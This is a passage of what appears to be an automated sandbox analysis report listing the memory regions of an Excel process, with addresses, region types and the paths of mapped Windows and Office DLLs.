name = "private_0x0000000008510000"
filename = ""
Region:
id = 404
start_va = 0x89d0000
end_va = 0x8dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089d0000"
filename = ""
Region:
id = 405
start_va = 0x8e70000
end_va = 0x8f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e70000"
filename = ""
Region:
id = 406
start_va = 0x8f90000
end_va = 0x908ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f90000"
filename = ""
Region:
id = 407
start_va = 0x9090000
end_va = 0x918ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009090000"
filename = ""
Region:
id = 408
start_va = 0x91e0000
end_va = 0x925ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091e0000"
filename = ""
Region:
id = 409
start_va = 0x92c0000
end_va = 0x92cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000092c0000"
filename = ""
Region:
id = 410
start_va = 0x92d0000
end_va = 0x93cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000092d0000"
filename = ""
Region:
id = 411
start_va = 0x93d0000
end_va = 0x9588fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 412
start_va = 0x9590000
end_va = 0x9d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009590000"
filename = ""
Region:
id = 413
start_va = 0x9eb0000
end_va = 0x9f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009eb0000"
filename = ""
Region:
id = 414
start_va = 0x9f30000
end_va = 0xa2b9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 415
start_va = 0xa410000
end_va = 0xa50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 416
start_va = 0xa5c0000
end_va = 0xa6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a5c0000"
filename = ""
Region:
id = 417
start_va = 0xa820000
end_va = 0xa89ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a820000"
filename = ""
Region:
id = 418
start_va = 0xa900000
end_va = 0xa9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a900000"
filename = ""
Region:
id = 419
start_va = 0xaae0000
end_va = 0xabdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aae0000"
filename = ""
Region:
id = 420
start_va = 0xac20000
end_va = 0xad1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ac20000"
filename = ""
Region:
id = 421
start_va = 0xad20000
end_va = 0xaf1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad20000"
filename = ""
Region:
id = 422
start_va = 0x37790000
end_va = 0x3779ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000037790000"
filename = ""
Region:
id = 423
start_va = 0x72d10000
end_va = 0x72d42fff
monitored = 0
entry_point = 0x72d11a80
region_type = mapped_file
name = "osppc.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")
Region:
id = 424
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 425
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 426
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 427
start_va = 0x77a40000
end_va = 0x77a42fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 428
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 429
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 430
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 431
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 432
start_va = 0x13f3f0000
end_va = 0x1414d0fff
monitored = 0
entry_point = 0x13f3f3830
region_type = mapped_file
name = "excel.exe"
filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe")
Region:
id = 433
start_va = 0x7febe060000
end_va = 0x7febe06ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007febe060000"
filename = ""
Region:
id = 434
start_va = 0x7fee76d0000
end_va = 0x7fee776ffff
monitored = 0
entry_point = 0x7fee774eb20
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll")
Region:
id = 435
start_va = 0x7fee7770000
end_va = 0x7fee8268fff
monitored = 0
entry_point = 0x7fee7827a3c
region_type = mapped_file
name = "chart.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll")
Region:
id = 436
start_va = 0x7fee8270000
end_va = 0x7fee8492fff
monitored = 0
entry_point = 0x7fee8272bf0
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll")
Region:
id = 437
start_va = 0x7fee84a0000
end_va = 0x7fee8548fff
monitored = 0
entry_point = 0x7fee84a1010
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 438
start_va = 0x7fee8550000
end_va = 0x7fee86cdfff
monitored = 0
entry_point = 0x7fee86567fc
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 439
start_va = 0x7fee86d0000
end_va = 0x7fee884afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 440
start_va = 0x7fee8850000
end_va = 0x7fee8915fff
monitored = 0
entry_point = 0x7fee88b0f3c
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 441
start_va = 0x7fee8920000
end_va = 0x7fee8aeffff
monitored = 0
entry_point = 0x7fee8aaef5c
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 442
start_va = 0x7fee8af0000
end_va = 0x7feed92efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll")
Region:
id = 443
start_va = 0x7feed930000
end_va = 0x7feee250fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 444
start_va = 0x7feee260000
end_va = 0x7feee567fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 445
start_va = 0x7feee570000
end_va = 0x7feee651fff
monitored = 0
entry_point = 0x7feee5ed90c
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 446
start_va = 0x7feee660000
end_va = 0x7feef93bfff
monitored = 0
entry_point = 0x7feee66caf0
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll")
Region:
id = 447
start_va = 0x7feef940000
end_va = 0x7fef010bfff
monitored = 0
entry_point = 0x7feef9d5f94
region_type = mapped_file
name = "mso99lwin32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll")
Region:
id = 448
start_va = 0x7fef0110000
end_va = 0x7fef09fafff
monitored = 0
entry_point = 0x7fef0215a48
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 449
start_va = 0x7fef0a00000
end_va = 0x7fef0e77fff
monitored = 0
entry_point = 0x7fef0a79154
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 450
start_va = 0x7fef0e80000
end_va = 0x7fef1183fff
monitored = 0
entry_point = 0x7fef0f26094
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 451
start_va = 0x7fef1190000
end_va = 0x7fef22fbfff
monitored = 0
entry_point = 0x7fef11953f0
region_type = mapped_file
name = "oart.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll")
Region:
id = 452
start_va = 0x7fef2300000
end_va = 0x7fef23c5fff
monitored = 0
entry_point = 0x7fef230f220
region_type = mapped_file
name = "msftedit.dll"
filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")
Region:
id = 453
start_va = 0x7fef26f0000
end_va = 0x7fef27c6fff
monitored = 0
entry_point = 0x7fef26f1074
region_type = mapped_file
name = "searchfolder.dll"
filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll")
Region:
id = 454
start_va = 0x7fef27d0000
end_va = 0x7fef283efff
monitored = 0
entry_point = 0x7fef27d1134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 455
start_va = 0x7fef2840000
end_va = 0x7fef2866fff
monitored = 0
entry_point = 0x7fef284e06c
region_type = mapped_file
name = "sppc.dll"
filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll")
Region:
id = 456
start_va = 0x7fef2a80000
end_va = 0x7fef2cd1fff
monitored = 0
entry_point = 0x7fef2ac766c
region_type = mapped_file
name = "wxpnse.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\wxpnse.dll")
Region:
id = 457
start_va = 0x7fef4850000
end_va = 0x7fef488afff
monitored = 0
entry_point = 0x7fef4851238
region_type = mapped_file
name = "mlang.dll"
filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll")
Region:
id = 458
start_va = 0x7fef4890000
end_va = 0x7fef48aefff
monitored = 0
entry_point = 0x7fef48957b8
region_type = mapped_file
name = "thumbcache.dll"
filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll")
Region:
id = 459
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 460
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 461
start_va = 0x7fef71b0000
end_va = 0x7fef722efff
monitored = 0
entry_point = 0x7fef720385c
region_type = mapped_file
name = "tiptsf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")
Region:
id = 462
start_va = 0x7fef7230000
end_va = 0x7fef726afff
monitored = 0
entry_point = 0x7fef7231070
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 463
start_va = 0x7fef7270000
end_va = 0x7fef727efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl30.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 464
start_va = 0x7fef7280000
end_va = 0x7fef7286fff
monitored = 0
entry_point = 0x7fef7281010
region_type = mapped_file
name = "msimg32.dll"
filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll")
Region:
id = 465
start_va = 0x7fef7290000
end_va = 0x7fef7294fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 466
start_va = 0x7fef72c0000
end_va = 0x7fef733afff
monitored = 0
entry_point = 0x7fef732bf74
region_type = mapped_file
name = "structuredquery.dll"
filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll")
Region:
id = 467
start_va = 0x7fef7600000
end_va = 0x7fef760bfff
monitored = 0
entry_point = 0x7fef7601380
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 468
start_va = 0x7fef7610000
end_va = 0x7fef7643fff
monitored = 0
entry_point = 0x7fef7611890
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")
Region:
id = 469
start_va = 0x7fef7ac0000
end_va = 0x7fef7b3ffff
monitored = 0
entry_point = 0x7fef7ac4a8c
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 470
start_va = 0x7fef7b40000
end_va = 0x7fef7b4bfff
monitored = 0
entry_point = 0x7fef7b41070
region_type = mapped_file
name = "cscdll.dll"
filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll")
Region:
id = 471
start_va = 0x7fef7b50000
end_va = 0x7fef7bcdfff
monitored = 0
entry_point = 0x7fef7b51304
region_type = mapped_file
name = "cscui.dll"
filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll")
Region:
id = 472
start_va = 0x7fef7bd0000
end_va = 0x7fef7c04fff
monitored = 0
entry_point = 0x7fef7bdc59c
region_type = mapped_file
name = "ehstorshell.dll"
filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")
Region:
id = 473
start_va = 0x7fef7c10000
end_va = 0x7fef848dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "grooveintlresource.dll"
filename = "\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll")
Region:
id = 474
start_va = 0x7fef8490000
end_va = 0x7fef8648fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 475
start_va = 0x7fef8650000
end_va = 0x7fef8965fff
monitored = 0
entry_point = 0x7fef8653e98
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 476
start_va = 0x7fef8970000
end_va = 0x7fef8972fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 477
start_va = 0x7fef8980000
end_va = 0x7fef8984fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 478
start_va = 0x7fef8990000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 479
start_va = 0x7fef89a0000
end_va = 0x7fef89a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 480
start_va = 0x7fef89b0000
end_va = 0x7fef89b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 481
start_va = 0x7fef89c0000
end_va = 0x7fef89c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 482
start_va = 0x7fef89d0000
end_va = 0x7fef89dbfff
monitored = 0
entry_point = 0x7fef89d4150
region_type = mapped_file
name = "vcruntime140_1.dll"
filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll")
Region:
id = 483
start_va = 0x7fef89e0000
end_va = 0x7fef8a70fff
monitored = 0
entry_point = 0x7fef8a32430
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")
Region:
id = 484
start_va = 0x7fef8a80000
end_va = 0x7fef8a83fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 485
start_va = 0x7fef8a90000
end_va = 0x7fef8a93fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 486
start_va = 0x7fef8aa0000
end_va = 0x7fef8aa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 487
start_va = 0x7fef8ab0000
end_va = 0x7fef8ab2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 488
start_va = 0x7fef8ac0000
end_va = 0x7fef8ac2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 489
start_va = 0x7fef8ad0000
end_va = 0x7fef8ad2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 490
start_va = 0x7fef8ae0000
end_va = 0x7fef8ae2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 491
start_va = 0x7fef8af0000
end_va = 0x7fef8af2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 492
start_va = 0x7fef8b00000
end_va = 0x7fef8b02fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 493
start_va = 0x7fef8b10000
end_va = 0x7fef8c01fff
monitored = 0
entry_point = 0x7fef8b19060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 494
start_va = 0x7fef8c10000
end_va = 0x7fef8c13fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 495
start_va = 0x7fef8c20000
end_va = 0x7fef8c38fff
monitored = 0
entry_point = 0x7fef8c2ee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 496
start_va = 0x7fef8c40000
end_va = 0x7fef8e53fff
monitored = 0
entry_point = 0x7fef8c41000
region_type = mapped_file
name = "grooveex.dll"
filename = "\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll")
Region:
id = 497
start_va = 0x7fef8e60000
end_va = 0x7fef8f2dfff
monitored = 0
entry_point = 0x7fef8e830fc
region_type = mapped_file
name = "msvcr110.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll")
Region:
id = 498
start_va = 0x7fef8f30000
end_va = 0x7fef8fd6fff
monitored = 0
entry_point = 0x7fef8f7b93c
region_type = mapped_file
name = "msvcp110.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll")
Region:
id = 499
start_va = 0x7fef8fe0000
end_va = 0x7fef9035fff
monitored = 0
entry_point = 0x7fef8fe86e8
region_type = mapped_file
name = "filesyncshell64.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll")
Region:
id = 500
start_va = 0x7fef9040000
end_va = 0x7fef9209fff
monitored = 0
entry_point = 0x7fef9047a60
region_type = mapped_file
name = "explorerframe.dll"
filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")
Region:
id = 501
start_va = 0x7fef9260000
end_va = 0x7fef9262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 502
start_va = 0x7fef9580000
end_va = 0x7fef958bfff
monitored = 0
entry_point = 0x7fef958602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 503
start_va = 0x7fef9590000
end_va = 0x7fef9603fff
monitored = 0
entry_point = 0x7fef95966f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 504
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 505
start_va = 0x7fefae00000
end_va = 0x7fefaea6fff
monitored = 0
entry_point = 0x7fefae1050c
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 506
start_va = 0x7fefaeb0000
end_va = 0x7fefaf04fff
monitored = 0
entry_point = 0x7fefaee6b20
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")
Region:
id = 507
start_va = 0x7fefaf10000
end_va = 0x7fefaf43fff
monitored = 0
entry_point = 0x7fefaf37cac
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")
Region:
id = 508
start_va = 0x7fefb130000
end_va = 0x7fefb13efff
monitored = 0
entry_point = 0x7fefb131040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 509
start_va = 0x7fefb140000
end_va = 0x7fefb149fff
monitored = 0
entry_point = 0x7fefb144938
region_type = mapped_file
name = "davhlpr.dll"
filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")
Region:
id = 510
start_va = 0x7fefb150000
end_va = 0x7fefb16bfff
monitored = 0
entry_point = 0x7fefb151198
region_type = mapped_file
name = "davclnt.dll"
filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")
Region:
id = 511
start_va = 0x7fefb370000
